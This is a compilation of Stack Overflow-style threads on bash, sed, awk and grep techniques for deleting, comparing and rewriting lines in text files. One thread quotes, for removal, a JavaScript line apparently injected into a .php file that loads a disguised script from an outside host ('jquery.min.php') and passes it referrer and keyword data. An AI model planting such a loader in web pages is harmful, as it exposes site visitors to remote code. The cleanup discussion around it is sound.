Removing strings from file using bash script - linux

I want to delete a specific strings from file.
I try to use:
for line3 in $(cat 2.txt)
do
if grep -Fxq $line3 4.txt
then
sed -i /$line3/d 4.txt
fi
done
I want this code to delete lines from 4.txt if they are also in 2.txt, but this loop deletes all lines from 4.txt and I have no idea why. Can someone tell what is wrong with this code ?
2.txt:
a
ab
abc
4.txt:
a
abc
abcdef

You can do this via single awk command:
awk 'ARGV[1] == FILENAME && FNR==NR {a[$1];next} !($1 in a)' 2.txt 4.txt
abcdef
To store output back to 4.txt use:
awk 'ARGV[1] == FILENAME && FNR==NR {a[$1];next} !($1 in a)' 2.txt 4.txt > _tmp && mv _tmp 4.txt
PS: Added ARGV[1] == FILENAME && to take care of empty file case as noted by #pjh below.

grep -F -v -x -f 2.txt 4.txt
or
grep -Fvxf 2.txt 4.txt
or
fgrep -vxf 2.txt 4.txt

Using just Bash (4) builtins:
declare -A found
while IFS= read -r line || [[ $line ]] ; do found[$line]=1 ; done <2.txt
while IFS= read -r line || [[ $line ]] ; do
(( ${found[$line]-0} )) || printf '%s\n' "$line"
done <4.txt
The '[[ $line ]]' tests are to handle files with unterminated last lines.
Use 'printf' instead of 'echo' in case any of the output lines begin with 'echo' options.

Look ma', only sed...
sed $( sed 's,^, -e /^,;s,$,$/d,' 2.txt ) 4.txt
Transform each line in 2.txt in a sed command, e.g., abc -> -e /^abc$/d
Give the list of sed commands to an instance of sed operating on 4.txt
To store output back to 4.txt use:
sed -i $( sed 's,^, -e /^,;s,$,$/d,' 2.txt ) 4.txt
edit: while I love my answer on an aesthetic base, please don't try
this at home! see pjh comment below for a detailed rationale of the
many ways in which my microscript may fail

Related

Bash: How to check for first three characters in a file

After some string conversion of heterogeneous data, there are files with the following content:
file1.txt:
mat 445
file2.txt:
mat 734.2
and so on. But there are also intruders that do not match that pattern, e. g.
filen.txt:
mat 1
FBW
With everything that starts with "mat" I would like to proceed while all other lines shall be deleted.
The following does not work (and seems rather ponderous):
for f in *.txt ; do
if [[ ${f:0:3} == "mat" ]]; then
# do some string conversion with that line, which is not important here
sed -i -e 's/^.*\(mat.*\).*$/\1/' $f
sed -i -e 's/ //g' $f
tr '.' '_' < $f
sed -i -e 's/^/\<http:\/\/uricorn.fly\/tib\_lok\_sys\#/' "$f"
sed -i -e 's/\(.*\)[0-9]/&> /' "$f"
else
# delete the line that does not match the pattern
sed -i -e '^[mat]/d' $f
fi
done
As the comment below shows the if condition is incorrect as it does not match the file's content but its name.
Desired output should then be:
file1.txt
<http://uricorn.fly/tib_lok_sys#mat445>
file2.txt
<http://uricorn.fly/tib_lok_sys#mat734_2>
filen.txt
<http://uricorn.fly/tib_lok_sys#mat1>
How can this be achieved?
Source data, with some extras added to the last 2 files:
$ for s in 1 2 n
do
fn="file${s}.txt"
echo "+++++++++++ ${fn}"
cat "${fn}"
done
+++++++++++ file1.txt
mat 445
+++++++++++ file2.txt
mat 734.2.3
+++++++++++ filen.txt
mat 1 2 3
FBW
One awk solution that implements the most recent set of question edits:
awk -i inplace ' # overwrite the source file
/^mat/ { gsub(/ /,"") # if line starts with "^mat" then remove spaces ...
gsub(/\./,"_") # and replace periods with underscores
printf "<http://uricorn.fly/tib_lok_sys#%s>\n", $0 # print the desired output
}
' file{1,2,n}.txt
NOTES:
the -i inplace option requires GNU awk 4.1.0 (or better)
remove comments to declutter code
The above generates the following:
$ for s in 1 2 n
do
fn="file${s}.txt"
echo "+++++++++++ ${fn}"
cat "${fn}"
done
+++++++++++ file1.txt
<http://uricorn.fly/tib_lok_sys#mat445>
+++++++++++ file2.txt
<http://uricorn.fly/tib_lok_sys#mat734_2_3>
+++++++++++ filen.txt
<http://uricorn.fly/tib_lok_sys#mat123>
Sed:
sed -ri '/^mat/{s/[ ]//g;s/[.]/_/g;s#^(.*)$#<http://uricorn.fly/tib_lok_sys#\1>#g}' *.txt
Search for lines starting with mat and then first remove spaces, replace . with _ and finally substitute this string with a string including the http string prepended.
The other answers are far more elegant, but none worked on my system so here is what did eventually:
for f in *.txt ; do
# Remove every line that does not contain 'mat'
sed -i '/mat/!d' $f
# Remove every character until 'mat' begins
sed -i -e 's/^.*\(mat.*\).*$/\1/' $f
# Remove the blank between 'mat' and number
sed -i -e 's/ //g' $f
# Replace the dot in subcategories with an underscore
tr '.' '_' < $f
# Add URI
sed -i -e 's/^/\<http:\/\/uricorn.fly\/tib\_lok\_sys\#/' "$f"
sed -i -e 's/\(.*\)[0-9]/&> /' "$f"
uniq $f
done

Linux - script to copy a line from one file to multiple other files

I'm stuck with this task:
I have a textfile 1.txt where there is 1 variable in each line. I have a textfile 2.txt where I want to replace line 3 with the variable of 1.txt and save it under a directory which has the same name as the variable. My idea was this:
!/bin/bash
for i in `cat 1.txt`;
do awk '{ if (NR == 3) print $i; else print $0}' 2.txt > "/$i/2.txt";
done
The last part works, I get the file in the expected folder. But it is always the same file just copied, not modified.
Any help appreciated
Edit: to make it more clear, my 1.txt. contains data like:
variable1
variable2
variable3
each in one line.
I now want to edit a file 2.txt, insert variable1 in line 3 and save it to /variable1/2.txt
then again open file 2.txt, insert variable2 in line 3 and save it to /variable2/2.txt
and so on....
hope that makes it more clear ;)
Not sure I quite follow what you are doing but the following code is one way to do what you describe:
#!/bin/bash
while IFS= read -r variable; do
mkdir "$variable"
echo -e "\n\n$variable" > "${variable}/2.txt"
done < 1.txt
The output is:
$ cat variable?/2.txt
variable1
variable2
variable3
EDIT: after reading the comment on the solution by #Jetchisel a similar solution using vims ex command is:
#!/bin/bash
while IFS= read -r variable; do
ex "+normal! 2G" "+normal o${variable}" "+wq" "${variable}/2.txt"
done < 1.txt
Here is how I understood your question.
while IFS= read -r lines; do
[[ ! -d "/$lines" ]] && { mkdir -p "/$lines" || exit; }
printf '%s\n' '3c' "$lines" . ,p Q | ed -s 2.txt > "/$lines/2.txt"
done < 1.txt

replace a whole line in a file centos

I have a script in .php file which is the following :
var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('http://mydemo.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<'+'/script>');}
I would like to replace in cmd line the whole line with (1) empty char. Is it possible? tried to do it with sed , but probably this is a too complex string.Tried to set the string in var , but didn't work either . Has anybody any idea?
This is actually something sed excels in. :)
sed -i '1s/.*/ /' your-file
Example:
$ cat test
one
two
three
$ sed '1s/.*/ /' < test
two
three
On my OS X i tested this script:
for strnum in $(grep -n "qwe" test.txt | awk -F ':' '{print $1}'); do cat test.txt | sed -i '.txt' $strnum's/.*/ /' test.txt; done
On CentOS should work this script:
for strnum in $(grep -n "qwe" test.txt | awk -F ':' '{print $1}'); do cat test.txt | sed -i $strnum's/.*/ /' test.txt; done
You should replace qwe with your pattern. It will replace all strings where pattern would be found to space.
To put right content in grep, it should be prepared. You should create file with required pattern and start command:
echo '"'$(cat your_file | sed -e 's|"|\\"|g')'"'
Result of this command should be replaced qwe(with quotes for sure).
You should get something like this:
for strnum in $(grep -n "var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+\"//\"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('http://mydemo.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<'+'/script>');}" test.txt | awk -F ':' '{print $1}'); do cat test.txt | sed -i $strnum's/.*/ /' test.txt; done

Comparing two files script and finding the unmatched data

I am having two .txt files with data stored in the format
1.txt
ASF001-AS-ST73U12
ASF001-AS-ST92U14
ASF001-AS-ST105U33
ASF001-AS-ST107U20
and
2.txt
ASF001-AS-ST121U21
ASF001-AS-ST130U14
ASF001-AS-ST73U12
ASF001-AS-ST92U14
`
I need to find the files which are in 1.txt but not in 2.txt.
I tried to use
diff -a --suppress-common-lines -y 1.txt 2.txt > finaloutput
but it didn't work
Rather than diff you can use comm here:
comm -23 <(sort 1.txt) <(sort 2.txt)
ASF001-AS-ST105U33
ASF001-AS-ST107U20
Or this awk will also work:
awk 'FNR==NR {a[$1];next} $1 in a{delete a[$1]} END {for (i in a) print i}' 1.txt 2.txt
ASF001-AS-ST107U20
ASF001-AS-ST105U33
A relatively simple bash script can do what you need:
#!/bin/bash
while read line || test -n "$line"; do
grep -q $line "$2" || echo "$line"
done < "$1"
exit 0
output:
$ ./uniquef12.sh dat/1.txt dat/2.txt
ASF001-AS-ST105U33
ASF001-AS-ST107U20

Show uncommon part of the line

Hi I have two files which contain paths. I want to compare the two files and show only uncommon part of the line.
1.txt:
/home/folder_name/abc
2.txt:
/home/folder_name/abc/pqr/xyz/mnp
Output I want:
/pqr/xyz/mnp
How can I do this?
This bit of awk does the job:
$ awk 'NR==FNR {a[++i]=$0; next}
{
b[++j]=$0;
if(length(a[j])>length(b[j])) {t=a[j]; a[j]=b[j]; b[j]=t}
sub(a[j],"",b[j]);
print b[j]
}' 2.txt 1.txt # or 2.txt 1.txt, it doesn't matter
Write the line from the first file to the array a.
Write the line from the second to b.
Swap a[j] and b[j] if a[j] is longer than b[j] (this might not be necessary if the longer text is always in b).
Remove the part found in a[j] from b[j] and print b[j].
This is a general solution; it makes no assumption that the match is at the start of the line, or that the contents of one file's line should be removed from the other. If you can afford to make those assumptions, the script can be simplified.
If the match may occur more than once on the line, you can use gsub rather than sub to perform a global substitution.
Considering you have strings in 1.txt and in 2.txt following code will do.
paste 1.txt 2.txt |
while read a b;
do
if [[ ${#a} -gt ${#b} ]];
then
echo ${a/$b};
else
echo ${b/$a};
fi;
done;
This is how it works on my system,
shiplu#:~/test/bash$ cat 1.txt
/home/shiplu/test/bash
/home/shiplu/test/bash/hello/world
shiplu#:~/test/bash$ cat 2.txt
/home/shiplu/test/bash/good/world
/home/shiplu/test/bash
shiplu#:~/test/bash$ paste 1.txt 2.txt |
> while read a b;
> do
> if [[ ${#a} -gt ${#b} ]];
> then
> echo ${a/$b};
> else
> echo ${b/$a};
> fi;
> done;
/good/world
/hello/world
This script will compare all lines in the file and only output the change in the line.
First it counts the number of lines in the first file.
Then i start a loop that will iterate for the number of lines.
Declare two variable that are the same line from both files.
Compare the lines and if they are the same output that they are.
If they are not then replace duplicate parts of the string with nothing(effectively removing them)
I used : as the seperator in sed as your variables contain /. So if they contain : then you may want to consider changing them.
Probably not the most efficient solution but it works.
#!/bin/bash
NUMOFLINES=$(wc -l < "1.txt")
echo $NUMOFLINES
for ((i = 1 ; i <= $NUMOFLINES ; i++)); do
f1=$(sed -n $i'p' 1.txt)
f2=$(sed -n $i'p' 2.txt)
if [[ $f1 < $f2 ]]; then
echo -n "Line $i:"
sed 's:'"$f1"'::' <<< "$f2"
elif [[ $f1 > $f2 ]]; then
echo -n "Line $i:"
sed 's:'"$f2"'::' <<< "$f1"
else
echo "Line $i: Both lines are the same"
fi
echo ""
done
If you happen to use bash, you could try this one:
echo $(diff <(grep -o . 1.txt) <(grep -o . 2.txt) \
| sed -n '/^[<>]/ {s/^..//;p}' | tr -d '\n')
It does a character-by-character comparison using diff (where grep -o . gives an intermediate line for each character to be fed to line-wise diff), and just prints the differences (intermediate diff output lines starting with markers < or > omitted, then joining lines with tr).
If you have multiple lines in your input (which you did not mention in your question) then try something like this (where % is a character not contained in your input):
diff <(cat 1.txt | tr '\n' '%' | grep -o .) \
<(cat 2.txt | tr '\n' '%' | sed -e 's/%/%%/g' | grep -o .) \
| sed -n '/^[<>]/ {s/^..//;p}' | tr -d '\n' | tr '%' '\n'
This extends the single-line solution by adding line end markers (e.g. %) which diff is forced to include in its output by adding % on the left and %% on the right.
If both the files have always a single line in each, then below works:
perl -lne '$a=$_ if($.==1);print $1 if(/$a(.*)/ && $.==2)' 1.txt 2.txt
Tested Below:
> cat 1.txt
/home/folder_name/abc
> cat 2.txt
/home/folder_name/abc/pqr/xyz/mnp
> perl -lne '$a=$_ if($.==1);print $1 if(/$a(.*)/ && $.==2)' 1.txt 2.txt
/pqr/xyz/mnp
>

Resources